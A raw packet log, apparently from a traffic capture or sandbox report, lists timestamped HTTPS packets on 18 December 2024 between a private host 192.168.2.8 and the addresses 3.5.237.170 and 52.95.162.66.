                                                                                                                                                                          Dec 18, 2024 13:06:32.249277115 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.298712015 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.305124998 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.305140972 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.305183887 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.305196047 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.305223942 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.305231094 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.305241108 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.305326939 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.362510920 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.408106089 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.514517069 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.514528990 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.514574051 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.514584064 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.514643908 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.514652014 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.514677048 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.514693975 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.521886110 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.564399004 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.727463007 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.727477074 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.727586985 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.727603912 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.727612972 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.727736950 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.733601093 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.773169994 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.773216009 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.773227930 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.773241043 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.773247957 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.773255110 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.773348093 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.779161930 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.779426098 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.975369930 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.975383043 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.975433111 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.975449085 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.975547075 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.975547075 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.975558996 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.012722015 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.012754917 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.012823105 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.012835979 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.012854099 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.064429998 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.208540916 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.208554029 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.208621025 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.208635092 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.208647013 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.208719969 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.208719969 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.208729029 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.241235971 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.241261005 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.241297960 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.241389990 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.241389990 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.241400003 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.283251047 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.435462952 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.435477018 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.435518026 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.435534000 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.435554028 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.435564995 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.435604095 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.435611010 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.464709997 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.464760065 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.464770079 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.464785099 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.464791059 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.464797020 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.464816093 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.464869976 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.493957043 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.493969917 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.494004011 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.494048119 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.494158983 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.494168997 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.494215012 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.674860001 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.674890041 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.674921989 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.675014973 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.675040960 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.675071001 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.691445112 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.691471100 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.691598892 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.691598892 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.691616058 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.706768036 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.706865072 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.706876040 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.706939936 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.708751917 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.708890915 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.910862923 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.910888910 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.911091089 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.911108971 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.911176920 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.911194086 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.926062107 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.926081896 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.926168919 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.926182032 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.938828945 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.938872099 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.938978910 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.938991070 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.939045906 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.939075947 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.018668890 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.018690109 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.018745899 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.018778086 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.018799067 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.018827915 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.019665956 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.064388990 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.152498960 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.152527094 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.152586937 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.152604103 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.152620077 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.152663946 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.167762995 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.167793036 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.167870045 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.167887926 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.167921066 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.183321953 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.183371067 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.183444023 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.183449984 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.183487892 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.236242056 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.236253023 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255580902 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255697012 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255718946 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255740881 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.255740881 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.255758047 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255786896 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.255795002 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255815983 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.298770905 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.298784971 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.345585108 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.387607098 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387618065 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387656927 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387669086 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387677908 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.387696028 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.387702942 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387713909 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.387734890 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.389405966 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403273106 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403302908 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403342962 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.403371096 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.403464079 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403482914 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403502941 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.420030117 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.420046091 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.420087099 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.420099020 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.420118093 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.420139074 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.435391903 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.435427904 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.435456991 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.435465097 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.435499907 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.486229897 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.486252069 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.533086061 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.615187883 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615219116 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615267038 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615272045 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.615288973 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615323067 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.615343094 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615350008 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.615385056 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.617059946 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629755974 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629800081 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629837036 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.629859924 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629873037 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629895926 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.629909039 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.631695986 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.631743908 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.635957003 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.636037111 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.636056900 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.636085987 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.636133909 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.643273115 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.883513927 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:34.883563042 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.883682013 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:34.883938074 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:34.883955956 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:36.755708933 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:36.759466887 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:36.759480953 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:37.567157984 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:37.611243010 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:37.815156937 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:37.815196037 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:37.815249920 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:37.815290928 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:37.815290928 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:37.815303087 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:37.815330982 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:37.815341949 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:37.815355062 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:37.815355062 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:37.815380096 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:37.815387964 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:37.861342907 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.277163029 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.277184963 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.277236938 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.277314901 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.277314901 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.277337074 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.277384043 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.516463041 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.516483068 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.516531944 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.516696930 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.516733885 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.516788960 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.533140898 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.533236027 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.533278942 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.533327103 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.533811092 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.542342901 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.542378902 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:38.542448997 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.542733908 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:38.542745113 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:40.446950912 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:40.448795080 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:40.448812962 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.247900963 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.298768044 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:41.497380018 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.497397900 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.497416973 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.497426987 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.497452974 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:41.497467041 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.497481108 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.497500896 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:41.497500896 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:41.497525930 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:41.959014893 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.959033966 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.959100008 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.959166050 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:41.959183931 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:41.959232092 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:41.959248066 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.217068911 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.217087030 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.217153072 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.217204094 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.217223883 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.217276096 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.343055010 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.343179941 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.670485020 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.670525074 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.670553923 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.670571089 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.670593977 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.670609951 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.672688007 CET4434972252.95.162.66192.168.2.8
